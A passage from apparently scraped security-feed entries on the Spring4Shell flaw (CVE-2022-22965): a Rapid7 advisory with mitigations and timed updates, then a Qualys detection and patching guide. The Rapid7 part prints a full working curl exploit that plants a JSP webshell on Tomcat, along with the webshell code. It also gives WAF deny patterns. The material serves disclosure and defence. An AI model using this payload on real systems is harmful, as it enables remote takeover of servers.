unauthenticated RCE vulnerability was [published](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) March 29, 2022 for Spring Cloud, which led some in the community to conflate the two unrelated vulnerabilities.\n\nRapid7\u2019s research team can confirm the zero-day vulnerability is real and provides unauthenticated remote code execution. Proof-of-concept exploits exist, but it\u2019s currently unclear which real-world applications use the vulnerable functionality. As of March 31, Spring has also [confirmed the vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. It affects Spring MVC and Spring WebFlux applications running on JDK 9+.\n\n## Known risk\n\nThe following conditions map to known risk so far:\n\n * Any components using Spring Framework versions before 5.2.20, 5.3.18 **AND** JDK version 9 or higher **are considered [potentially vulnerable](<https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751>)**;\n * Any components that meet the above conditions **AND** are using @RequestMapping annotation and Plain Old Java Object (POJO) parameters **are considered actually vulnerable** and are at some risk of being exploited;\n * Any components that meet the above conditions **AND** are running Tomcat **are _currently_ most at risk of being exploited** (due to [readily available exploit code](<https://github.com/craig/SpringCore0day>) that is known to work against Tomcat-based apps).\n\n## Recreating exploitation\n\nThe vulnerability appears to affect functions that use the [@RequestMapping](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/bind/annotation/RequestMapping.html>) annotation and POJO (Plain Old Java Object) parameters. Here is an example we hacked into a [Springframework MVC demonstration](<https://github.com/RameshMF/spring-mvc-tutorial/tree/master/springmvc5-helloworld-exmaple>):\n \n \n package net.javaguides.springmvc.helloworld.controller;\n \n import org.springframework.stereotype.Controller;\n import org.springframework.web.bind.annotation.InitBinder;\n import org.springframework.web.bind.annotation.RequestMapping;\n \n import net.javaguides.springmvc.helloworld.model.HelloWorld;\n \n /**\n * @author Ramesh Fadatare\n */\n @Controller\n public class HelloWorldController {\n \n \t@RequestMapping(\"/rapid7\")\n \tpublic void vulnerable(HelloWorld model) {\n \t}\n }\n \n\nHere we have a controller (`HelloWorldController`) that, when loaded into Tomcat, will handle HTTP requests to `http://name/appname/rapid7`. The function that handles the request is called `vulnerable` and has a POJO parameter `HelloWorld`. Here, `HelloWorld` is stripped down but POJO can be quite complicated if need be:\n \n \n package net.javaguides.springmvc.helloworld.model;\n \n public class HelloWorld {\n \tprivate String message;\n }\n \n\nAnd that\u2019s it. That\u2019s the entire exploitable condition, from at least Spring Framework versions 4.3.0 through 5.3.15. (We have not explored further back than 4.3.0.)\n\nIf we compile the project and host it on Tomcat, we can then exploit it with the following `curl` command. Note the following uses the exact same payload used by the original proof of concept created by the researcher (more on the payload later):\n \n \n curl -v -d \"class.module.classLoader.resources.context.parent.pipeline\n .first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%\n 22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRunt\n ime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%\n 20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20\n while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7\n D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context\n .parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources\n .context.parent.pipeline.first.directory=webapps/ROOT&class.module.cl\n assLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl\n ass.module.classLoader.resources.context.parent.pipeline.first.fileDat\n eFormat=\" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-\n SNAPSHOT/rapid7\n \n\nThis payload drops a password protected webshell in the Tomcat ROOT directory called `tomcatwar.jsp`, and it looks like this:\n \n \n - if(\"j\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in\n = -.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();\n int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out.\n println(new String(b)); } } -\n \n\nAttackers can then invoke commands. Here is an example of executing `whoami` to get `albinolobster`:\n\n\n\nThe Java version does appear to matter. Testing on OpenJDK 1.8.0_312 fails, but OpenJDK 11.0.14.1 works.\n\n## About the payload\n\nThe payload we\u2019ve used is specific to Tomcat servers. It uses a technique that was popular as far back as the 2014, that alters the **Tomcat** server\u2019s logging properties via ClassLoader. The payload simply redirects the logging logic to the `ROOT` directory and drops the file + payload. A good technical write up can be found [here](<https://hacksum.net/2014/04/28/cve-2014-0094-apache-struts-security-bypass-vulnerability/>).\n\nThis is just one possible payload and will not be the only one. We\u2019re certain that malicious class loading payloads will appear quickly.\n\n## Mitigation guidance\n\nAs of March 31, 2022, CVE-2022-22965 has been assigned and Spring Framework versions 5.3.18 and 5.2.20 have been released to address it. Spring Framework users should update to the fixed versions starting with internet-exposed applications that meet criteria for vulnerability (see `Known Risk`). As organizations build an inventory of affected applications, they should also look to gain visibility into process execution and application logs to monitor for anomalous activity.\n\nFurther information on the vulnerability and ongoing guidance are being provided in [Spring\u2019s blog here](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>). The Spring [documentation](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html>) for DataBinder explicitly notes that:\n\n\u200b\u200b\u2026there are potential security implications in failing to set an array of allowed fields. In the case of HTTP form POST data for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.\n\nTherefore, one line of defense would be to modify source code of custom Spring applications to ensure those field guardrails are in place. Organizations that use third-party applications susceptible to this newly discovered weakness cannot take advantage of this approach.\n\nIf your organization has a web application firewall (WAF) available, profiling any affected Spring-based applications to see what strings can be used in WAF detection rulesets would help prevent malicious attempts to exploit this weakness.\n\nIf an organization is unable to patch or use the above mitigations, one failsafe option is to model processes executions on systems that run these Spring-based applications and then monitor for anomalous, \u201cpost-exploitation\u201d attempts. These should be turned into alerts and acted upon immediately via incident responders and security automation. One issue with this approach is the potential for false alarms if the modeling was not comprehensive enough.\n\n## Vulnerability disambiguation\n\nThere has been significant confusion about this zero-day vulnerability because of an unrelated vulnerability in another Spring project that was published March 29, 2022. That vulnerability, [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>), affects Spring Cloud Function, which is not in Spring Framework. Spring released version 3.1.7 & 3.2.3 to address CVE-2022-22963 on March 29.\n\nFurther, yet another vulnerability [CVE-2022-22950](<https://tanzu.vmware.com/security/cve-2022-22950>) was assigned on March 28. A fix was released on the same day. To keep things confusing, this medium severity vulnerability (which can cause a DoS condition) DOES affect Spring Framework versions 5.3.0 - 5.3.16.\n\n## Updates\n\n### March 30, 2020 - 9PM EDT\n\nThe situation continues to evolve but Spring.IO has yet to confirm the vulnerability. That said, we are actively testing exploit techniques and combinations. In the interim for organizations that have large deployments of the core Spring Framework or are in use for business critical applications we have validated the following two mitigations. Rapid7 Labs has not yet seen evidence of exploitation in the wild.\n\n#### WAF Rules\n\nReferenced previously and reported elsewhere for organizations that have WAF technology, string filters offer an effective deterrent, "class._", "Class._", "_.class._", and "_.Class._". These should be tested prior to production deployment but are effective mitigation techniques.\n\n#### Spring Framework Controller advice\n\nOur friends at [Praetorian](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>) have suggested a heavy but validated mitigation strategy by using the Spring Framework to disallow certain patterns. In this case any invocation containing \u201cclass\u201d. Praetorian example is provided below. The heavy lift requires recompiling code, but for those with few options it does prevent exploitation.\n\nimport org.springframework.core.Ordered; \nimport org.springframework.core.annotation.Order; \nimport org.springframework.web.bind.WebDataBinder; \nimport org.springframework.web.bind.annotation.ControllerAdvice; \nimport org.springframework.web.bind.annotation.InitBinder;\n\n@ControllerAdvice \n@Order(10000) \npublic class BinderControllerAdvice { \n@InitBinder \npublic void setAllowedFields(WebDataBinder dataBinder) { \nString[] denylist = new String[]{"class._", "Class._", "_.class._", "_.Class._"}; \ndataBinder.setDisallowedFields(denylist); \n} \n}\n\n### March 31, 2022 - 7 AM EDT\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and is working on an emergency release. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+.\n\nOur next update will be at noon EDT on March 31, 2022.\n\n### March 31, 2022 - 10 AM EDT\n\nCVE-2022-22965 has been assigned to this vulnerability. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it.\n\n### March 31, 2022 - 12 PM EDT\n\nWe have added a `Known Risk` section to the blog to help readers understand the conditions required for applications to be potentially or known vulnerable.\n\nOur team is testing ways of detecting the vulnerability generically and will update on VM and appsec coverage feasibility by 4 PM EDT today (March 31, 2022).\n\n### March 31, 2022 - 4 PM EDT\n\ntCell will alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE 2022-22965) are loaded by the application. The tCell team is also working on adding a specific detection for Spring4Shell. An InsightAppSec attack module is under development and will be released to all application security customers (ETA April 1, 2022). We will publish additional guidance and detail for application security customers tomorrow, on April 1.\n\nInsightVM customers utilizing Container Security can now assess containers that have been built with a vulnerable version of Spring. At this time we are not able to identify vulnerable JAR files embedded with WAR files in all cases, which we are working on improving. Our team is continuing to test ways of detecting the vulnerability and will provide another update on the feasibility of VM coverage at 9 PM EDT.\n\n### March 31, 2022 - 9 PM EDT\n\nMultiple [reports](<https://twitter.com/bad_packets/status/1509603994166956049>) have indicated that attackers are scanning the internet for applications vulnerable to Spring4Shell. There are several reports of exploitation in the wild. SANS Internet Storm Center [confirmed exploitation in the wild](<https://isc.sans.edu/forums/diary/Spring+Vulnerability+Update+Exploitation+Attempts+CVE202222965/28504/>) earlier today.\n\nOur team is working on both authenticated and remote vulnerability checks for InsightVM and Nexpose customers. We will provide more specific ETAs in our next update at 11 AM EDT on April 1.\n\n### April 1, 2022 - 11 AM EDT\n\nOur team is continuing to test ways of detecting CVE-2022-22965 and expects to have an authenticated check for Unix-like systems available to InsightVM and Nexpose customers in today\u2019s (April 1) content release. We are also continuing to research remote check capabilities and will be working on adding InsightAgent support in the coming days. Our next update will be at 3 PM EDT on April 1, 2022.\n\nFor information and updates about Rapid7\u2019s internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>). At this time, we have not detected any successful exploit attempts in our systems or solutions.\n\n### April 1, 2022 - 3 PM EDT\n\nOur team intends to include an authenticated check for InsightVM and Nexpose customers in a content-only release this evening (April 1). We will update this blog at or before 10 PM EDT with the status of that release.\n\nAs of today, a new block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy.\n\n### April 1 - 7:30 PM EDT\n\nInsightVM and Nexpose customers can now scan their environments for Spring4Shell with authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release next week to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable.\n\nOur team is actively working on a Windows authenticated check as well as improvements to the authenticated Unix and remote checks. More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nInsightAppSec customers can now scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>). A [blog is available](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>) on securing your applications against Spring4Shell.\n\n### April 4 - 2 PM EDT\n\nApplication Security customers with on-prem scan engines now have access to the updated Remote Code Execution (RCE) module which specifically tests for Spring4Shell.\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nOur next update will be at 6 PM EDT.\n\n### April 4 - 6 PM EDT\n\nOur team is continuing to actively work on a Windows authenticated check as well as accuracy improvements to both the authenticated Unix and remote checks.\n\nOur next update will be at or before 6pm EDT tomorrow (April 5).\n\n### April 5 - 6 PM EDT\n\nA product release of InsightVM (version 6.6.135) is scheduled for tomorrow, April 6, 2022. It will include authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. A vulnerability check making use of this fingerprinting will be released later this week.\n\nWe have also received some reports of false positive results from the remote check for CVE-2022-22965; a fix for this is expected in tomorrow\u2019s (April 6) **content release**. This week\u2019s Insight Agent release, expected to be generally available on April 7, will also add support for the authenticated Unix check for CVE-2022-22965.\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### April 6 - 6 PM EDT\n\nToday\u2019s product release of InsightVM (version 6.6.135) includes authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. A vulnerability check making use of this fingerprinting will be released later this week.\n\nToday\u2019s content release, available as of 6pm EDT, contains a fix for false positives some customers were experiencing with our remote (HTTP-based) check when scanning Microsoft IIS servers.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), expected to be generally available by Friday April 8, will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 7 - 5:30 PM EDT\n\nToday\u2019s content release for InsightVM and Nexpose (available as of 4:30pm EDT) contains a new authenticated vulnerability check for Spring Framework on Windows systems. The April 6 product release (version 6.6.135) is required for this check. Note that this functionality requires the \u201cEnable Windows File System Search\u201d option to be set in the scan template.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), which will be generally available tomorrow (April 8), will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 8 - 3 PM EDT\n\nThe Insight Agent release (version 3.1.4.48) to add data collection support for Spring4Shell on macOS and Linux is now expected to be available starting the week of April 11, 2022.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T22:33:54", "type": "rapid7blog", "title": "Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2021-44228", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-30T22:33:54", "id": "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "href": "https://blog.rapid7.com/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-04-08T16:57:59", "description": "_This page last updated: April 7th_\n\nA new zero-day Remote Code Execution (RCE) vulnerability, \u201cSpring4Shell\u201d or \u201cSpringShell\u201d was disclosed in the Spring framework. An unauthorized attacker can exploit this vulnerability to remotely execute arbitrary code on the target device. \n\n### What is Spring Framework? \n\nSpring-core is a prevalent framework widely used in Java applications that allows software developers to develop Java applications with enterprise-level components effortlessly. \n\n### Which versions are vulnerable? \n\nThe vulnerability requires JDK version 9 or later to be running. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions are vulnerable. It allows remote attackers to plant a web shell when running Spring framework apps on top of JRE 9. It is caused by unsafe deserialization of given arguments that a simple HTTP POST request can trigger to allow full remote access. \n\n### How can this be exploited? \n\nThe exploitation of this vulnerability relies on an endpoint with DataBinder enabled, which decodes data from the request body automatically. This property could enable an attacker to leverage Spring4Shell against a vulnerable application. In fact, the Spring framework class DataBinder warns about this in its [documentation](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html>): \n\n\u201cNote that there are potential security implications in failing to set an array of allowed fields. In the case of HTTP form POST data, for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases, this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.\u201d \n\n### What are the prerequisites to exploit this vulnerability? \n\n * JDK 9 or higher \n * Apache Tomcat as the Servlet container \n * Packaged as a traditional WAR (in contrast to a Spring Boot executable jar) \n * spring-webmvc or spring-webflux dependency \n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions \n\n### Is there a patch available for Spring4Shell? \n\nSpring Framework 5.3.18 and 5.2.20, that contain the fixes, have been released. If you\u2019re able to upgrade to Spring Framework **5.3.18** and **5.2.20**, no workarounds are necessary. \n\nIn case you cannot update to the latest Spring Framework version upgrading to Apache Tomcat **10.0.20**, **9.0.62**, or **8.5.78** provides adequate protection but not solves the vulnerability completely. \n\nIn addition, there are multiple working proof-of-concept (PoC) exploits available for Spring4Shell. We strongly recommend that organizations deploy these mitigations or use a third-party firewall for defense. \n\n### Qualys Coverage \n\nQualys Research Team has released the following authenticated QIDs to address this vulnerability for now. These QIDs will be available starting with vulnsigs version VULNSIGS-2.5.438-3 and in Cloud Agent manifest version LX_MANIFEST-2.5.438.3-2. \n\n**QID**| **Title**| **Version**| **Available for** \n---|---|---|--- \n376506| Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell)| VULNSIGS-2.5.438-3| Scanner/Cloud Agent \n45525| Spring core or Spring beans jar detected| VULNSIGS-2.5.438-3| Scanner/Cloud Agent \n150494| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (CVE-2022-22963)| VULNSIGS-2.5.440-3| Web Application Security \n376508| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (Authenticated)| VULNSIGS-2.5.440-6/ lx_manifest-2.5.440.6-5| Scanner/Cloud Agent \n730418| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (Unauthenticated Check)| VULNSIGS-2.5.440-6| Scanner \n150495 | Spring Core Remote Code Execution (RCE) Vulnerability CVE-2022-22965 (Spring4Shell) | VULNSIGS-2.5.443-3 | Web Application Security \n48209 | Spring Framework and Spring Boot JARs Spring Cloud JARs Detected Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n376514 | Spring Framework Remote Code Execution (RCE) Vulnerability (Spring4Shell) Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n376520 | Spring Cloud Function Remote Code Execution (RCE) Vulnerability Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n730416 | Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell) (Unauthenticated Check) | VULNSIGS-2.5.445-3 | Scanner \n \n### Discover Your Attack Surface with up-to-date CyberSecurity Asset Management \n\nAs a first step, Qualys recommends assessing all assets in your environment to map the entire attack surface of your organization. \n\n#### Scoping Potential Attack Surface \n\nQualys Cybersecurity Asset Management (CSAM) continuously inventories all your assets and software. Use CSAM to find assets with Apache Tomcat running on JDK 9 or higher. \n \n \n QQL: _software:(name:tomcat) and software:(name:\"jdk\" and version>=9)___ \n\n\n\n#### Finding Vulnerable Spring Components and Versions \n\nQualys CSAM can further help you narrow down the scope by adding Spring Framework to the search criteria, and specifically match on vulnerable components and versions. This can be used to find assets that have not yet been scanned with VMDR for the Spring4Shell QIDs yet. \n \n \n QQL: software:(name:tomcat) and software:(name:\"jdk\" and version>=9) and software:(name:\"Spring\" and version:\"vulnerable\") \n\n#### Monitoring Upgrades and Mitigations \n\nUpgrading to Spring Framework 5.3.18+ or 5.2.20+ addresses the root cause and prevents other attack vectors, and it adds protection for other CVEs. Qualys CSAM allows customers to list all Spring Framework versions and verify upgrades. \n\nHowever, some may be in a position where upgrading is not possible to do quickly. VMware provided the mitigation alternative to upgrade Apache Tomcat to versions 10.0.20, 9.0.62, or 8.5.78, which close the attack vector on Tomcat\u2019s side. Qualys CSAM allows you to check for the presence or absence of these Tomcat updates. \n\nQQL for assets with mitigated Tomcat: \n \n \n software:(name:tomcat and update:[`10.0.20`,`9.0.62`,`8.5.78`]) \n\nQQL for assets excluding mitigated Tomcat: \n \n \n software:(name:tomcat and not update:[`10.0.20`,`9.0.62`,`8.5.78`]) and software:(name:\"jdk\" and version>=9) and software:(name:\"Spring\" and version:\"vulnerable\") \n\n#### Context Is Critical to Prioritize and Remediate \n\nSecurity teams need to understand the distribution of affected assets from different perspectives, such as internet-exposed, production versus non-production, and which of these assets support business-critical services. Qualys CSAM integrates with additional sources, to import asset and business context, that helps customers further understand their impact, prioritize assets based on business criticality, and work with corresponding asset owners and support groups to take remedial actions. \n\nQQL for assets with Tomcat exposed to the internet and visible in Shodan: \n \n \n software:(name:tomcat) and software:(name:\"jdk\" and version>=9) and tags.name:shodan \n\n\n\n### Detect the Vulnerability with Qualys WAS\n\nSecond, protect your public Internet-facing apps, as they are the most exposed to attack and therefore high priority. \n\nThe Qualys WAS Research Team has developed two signatures for detecting vulnerable versions of the Spring Framework. \n\n * QID 150494 (released April 1st) will report vulnerable versions of Spring Cloud Applications (CVE-2022-22963). \n * QID 150495 (released on 6th) will report vulnerable versions of Spring Core Applications (CVE-2022-22965). \n\nThese QIDs are automatically added to the Core Detection Scope. If you are scanning web applications with the Initial WAS Option Profile then there is no further action necessary. Your scans will automatically test for vulnerable versions of the Spring Framework and report any vulnerable instances found. \n\nIf you are using a custom Option Profile for your scans, please ensure you are either using the Core Detection Scope in your Option Profile or adding the above QIDs to any static or dynamic Custom Search Lists. \n\n\n\nThese QIDs collectively use a combination of Out-of-Band and non-Out-of-Band tests for accurate detection. \n\n\n\nThe WAS Research Team is investigating other safe methods for detecting this vulnerability to compensate for potential False Negatives or False Positive cases. In the meantime, it is recommended to use WAS in coordination with other Qualys modules for a more comprehensive methodology for detecting the Spring4Shell vulnerability. \n\nIf your application is vulnerable to Spring4Shell, it is recommended that you immediately follow the steps outlined in the \u201cIs there a patch available for Spring4Shell?\u201d section of this blog. \n\n### Detect Spring4Shell Vulnerability Using Qualys VMDR\n\nNext, it\u2019s time to find Spring4Shell wherever it is hiding in your environment and prioritize your response. \n\nQualys VMDR customers should ensure all their assets are scanned against the above QIDs. As this vulnerability only targets the Spring Framework when deployed with JDK>9 and Tomcat, customers must at least ensure assets with Tomcat and JDK>9 are scanned. The following QQL can be used to find such assets: \n \n \n software:(name:tomcat and not update:[`10.0.20`,`9.0.62`,`8.5.78`]) and software:(name:\"jdk\" and version>=9) \n\n\n\nOnce assets have been scanned for the above QIDs, customers can use the following QQL to search for the Spring4Shell vulnerability in their environment: \n\nvulnerabilities.vulnerability.qid:376506 \n\n\n\n### Track Spring4Shell Progress with Unified Dashboard\n\nThe Unified Dashboard enables you to track this vulnerability and its impacted hosts, their status, and overall management in real-time. To help you quickly find vulnerable hosts and software, a new unified dashboard is created on the Qualys platform. This dashboard has extremely useful widgets listing all the vulnerable hosts, applications with vulnerable versions of Spring, and most importantly all the vulnerable hosts visible on the Internet. It provides visibility to compliance configurations and software on your \u2018External Attack Surface\u2019 visible on [Shodan](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) being the low-hanging opportunities for attackers. These widgets also list workloads hosted on shared cloud infrastructure and that have public IP addresses. To use this capability, download and import this Global Dashboard. \n\n[[Download and import \u201cSpring4Shell\u201d Global Dashboard](<https://2jws2s3y97dy39441y2lgm98-wpengine.netdna-ssl.com/wp-content/uploads/2022/04/QLYS-Spring4Shell-Dashboard.zip>)](<https://blog.qualys.com/wp-content/uploads/2022/04/QLYS-Spring4Shell-Dashboard-2.zip>)[Download](<https://blog.qualys.com/wp-content/uploads/2022/04/QLYS-Spring4Shell-Dashboard-2.zip>)\n\n\n\n### Detect Spring4Shell Vulnerabilities in Running Containers & Images\n\nIf you run Apache Tomcat in containers, then it is critical that you check for Spring4Shell vulnerabilities, given the high severity of this potential exploit. Qualys Container Security offers multiple methods to help you detect Spring4Shell vulnerabilities in your container environment. The Container Security sensor checks both running containers and container images for the following vulnerabilities: \n\n * QID 376506(CVE-2022-22965) \n * QID 376508 (CVE-2022-22963 \n\nTo detect vulnerabilities in running containers, you must deploy the Container Security sensor in \u201cGeneral\u201d mode on the hosts running the containers. You can view the containers impacted by these vulnerabilities by navigating to the \u201cContainer Security\u201d application, then selecting the \u201cAssets-> Container\u201d tab, and using the following QQL query: \n\nvulnerabilities.qid:376506 or vulnerabilities.qid:376508 \n\n\n\nTo view details of the vulnerability, you can click on the vulnerable container and navigate to the \u201cVulnerabilities\u201d tab as shown in the screenshot below: \n\n\n\nIn addition to scanning running containers, Qualys recommends that you scan container images for Spring4Shell vulnerabilities. Catching and remediating Spring4Shell vulnerabilities in container images will eliminate exposure to the vulnerabilities when the image is instantiated as a container. \n\nTo view all the impacted images, navigate to the Qualys Container Security app, then select the \u201cAssets -> Images\u201d tab, and use the following QQL query: \n \n \n vulnerabilities.qid:376506 or vulnerabilities.qid:376508 \n\n\n\nTo view details of the vulnerability, you can click on the image and navigate to the \u201cVulnerabilities\u201d tab as shown in the screenshot below: \n\n\n\nQualys Container Security offers a comprehensive solution for detecting vulnerabilities, including Spring4Shell, across the entire lifecycle of the container from build time to runtime. \n\n### Remediate Spring4Shell Using Qualys Patch Management\n\nThe recommended way to patch this vulnerability is by updating to Spring Framework 5.3.18 and 5.2.20 or greater. Customers can use Patch Management\u2019s install software action to download and script the upgrade. Note that customers can create a patch job that only includes the install/script action, in such case there is no need to add patches to the job. Alternatively, if upgrading the Spring Framework is not possible, customers can use Qualys patch management to patch Tomcat to versions: 10.0.20, 9.0.62, or 8.5.78. Tomcat patches are supported out-of-the-box and require no special configuration. \n\n\n\n### Detect Spring4Shell Exploitation Attempts with Qualys XDR\n\nAn important last step in confronting Spring4Shell is to ensure that your organization has not already been targeted by attacks that exploit this vulnerability. \n\nThe Qualys Threat Intelligence team has released the following XDR correlation rules for detecting Remote Code Execution exploitation attempts. These rules are available today via your TAM for quick import and implementation and will be delivered as part of a rule pack in a future XDR release. \n\nT1190 - [Palo Alto Firewall] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Check Point IPS] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Fortinet Firewall] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Trend Micro TippingPoint IPS] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\n### FAQ: \n\n#### Is this vulnerability related to CVE-2022-22963? \n\nThere is some confusion about this zero-day vulnerability due to another unrelated Spring vulnerability (CVE-2022-22963) published on March 29, 2022. This vulnerability, CVE-2022-22963, impacts Spring Cloud Function, which is not in Spring Framework. \n\nQIDs 376508 and 730418 are available to address this CVE. \n\n#### What is the detection logic for QID 376506: Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell)? \n\nQID 376506 is an authenticated check currently supported on Linux and Windows Operating Systems. \n\nOn Linux systems, detection checks if system has java 9 or later versions and executes \u2018locate\u2019 and \u2018 ls -l /proc/*/fd \u2018 to checks if one of the \u2018 spring-webmvc-*.jar \u2018, \u2018 spring-webflux*.jar \u2018 or \u2018 spring-boot.*jar \u2018 present on the system. \n\nOn Windows system, detection checks vulnerable instances of Spring via WMI to check spring-webmvc, spring-webflux and spring-boot are included in the running processes via command-line with JDK9 or higher. \n\nContainer Sensor image scanning uses find command to check for spring-webmvc, spring-webflux and spring-boot jars from .war files along with JDK9 or higher. \n\n#### Under what situations would QID 376506 not detect the vulnerability? \n\nQID 376506 might not be detected if access to /proc/*/fd is restricted or if the spring-core or spring-beans file is embedded inside other binaries, such as jar, war, etc. \n\nFurthermore, this QID might not be detected if the locate command is not available on the target. Targets on Java versions less than 9 are not vulnerable. \n\n#### What is the detection logic for QID 730416 (unauthenticated check)? \n\nQID 730416 is a remote unauthenticated check. It sends a specially crafted HTTP GET request to the remote web application and tries to get a callback on scanner using payload: \n \n \n 